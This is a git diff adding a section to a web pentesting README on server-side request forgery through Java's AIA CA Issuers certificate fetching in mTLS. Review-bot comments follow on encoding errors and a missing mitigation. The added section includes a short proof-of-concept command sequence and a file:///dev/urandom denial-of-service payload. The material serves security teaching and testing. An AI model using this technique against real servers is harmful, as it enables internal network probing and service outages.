diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/README.md b/src/pentesting-web/ssrf-server-side-request-forgery/README.md index 3e75402e8b5..0c8ad779296 100644 --- a/src/pentesting-web/ssrf-server-side-request-forgery/README.md +++ b/src/pentesting-web/ssrf-server-side-request-forgery/README.md 
@@ -142,6 +142,23 @@ In this configuration, the value from the Server Name Indication (SNI) field is openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf ``` +## SSRF via TLS AIA CA Issuers (Java mTLS) + +Some TLS stacks will auto-download missing intermediate CAs using the **Authority Information Access (AIA) โ†’ CA Issuers** URI inside the peer certificate. In **Java**, enabling `-Dcom.sun.security.enableAIAcaIssuers=true` while running an mTLS service makes the server dereference attacker-controlled URIs from the client certificate **during the handshake**, before any HTTP logic runs. + +- **Requirements**: mTLS enabled, Java AIA fetching enabled, attacker can present a client cert with a crafted AIA CA Issuers URI. +- **Triggering SSRF** (Java 21 example): + ```bash + java -Djava.security.debug=certpath \ + -Dcom.sun.security.enableAIAcaIssuers=true \ + -Dhttp.agent="AIA CA Issuers PoC" -jar server.jar + # Attacker cert AIA: http://localhost:8080 + nc -l 8080 -k # observe the outbound fetch + curl https://mtls-server:8444 --key client-aia-key.pem --cert client-aia-localhost-cert.pem --cacert ca-cert.pem + ``` + The Java certpath debug output shows `CertStore URI:http://localhost:8080`, and `nc` captures the HTTP request with the controllable `User-Agent` from `-Dhttp.agent`, proving SSRF during certificate validation. +- **DoS via file://**: setting AIA CA Issuers to `file:///dev/urandom` on Unix-like hosts makes Java treat it as a CertStore and read unbounded random bytes, keeping a CPU core busy and blocking subsequent connections even after the client disconnects. + ## [Wget file upload](../file-upload/index.html#wget-file-upload-ssrf-trick) ## SSRF with Command Injection 
@@ -441,5 +458,7 @@ https://github.com/incredibleindishell/SSRF_Vulnerable_Lab - [https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/](https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/) - [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) - [Positive Technologies โ€“ Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?](https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/) +- [Tenable โ€“ SSRF Vulnerability in Java TLS Handshakes That Creates DoS Risk](https://www.tenable.com/blog/tenable-discovers-ssrf-vulnerability-in-java-tls-handshakes-that-creates-dos-risk) +- [RFC 5280 ยง4.2.2.1 Authority Information Access](https://datatracker.ietf.org/doc/html/rfc5280#section-4.2.2.1) {{#include ../../banners/hacktricks-training.md}}
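Review bot: in the first hunk (the new `## SSRF via TLS AIA CA Issuers (Java mTLS)` section), the arrow in "Authority Information Access (AIA) โ†’ CA Issuers" is mis-encoded UTF-8 and should be `->` or a correctly encoded `→` before merge. Two smaller points on the same hunk: the bash block chains three commands that belong to different terminals (the `java` server, the `nc` listener and the `curl` client), and the `java` command never returns, so a `# terminal 1` / `# terminal 2` / `# terminal 3` comment on each would stop readers from pasting it as one script; and since the text only says the property must be enabled, a sentence noting that `com.sun.security.enableAIAcaIssuers` defaults to `false`, so the fix is to leave it unset on mTLS servers and to restrict outbound egress from the TLS terminator, would give the section the mitigation it currently lacks.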
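Review bot: the two added reference entries in the second hunk carry the same mis-encoding as the prose above them: `Tenable โ€“` should be `Tenable –` (or a plain hyphen) and `RFC 5280 ยง4.2.2.1` should be `RFC 5280 §4.2.2.1`; the unchanged `Positive Technologies โ€“` context line shows the existing entry was already committed this way, so it is worth fixing all three in one pass rather than propagating the artifact. The link text and target of the RFC entry are otherwise correct (section 4.2.2.1 of RFC 5280 is Authority Information Access) and the entries follow the `- [title](url)` style of the surrounding list.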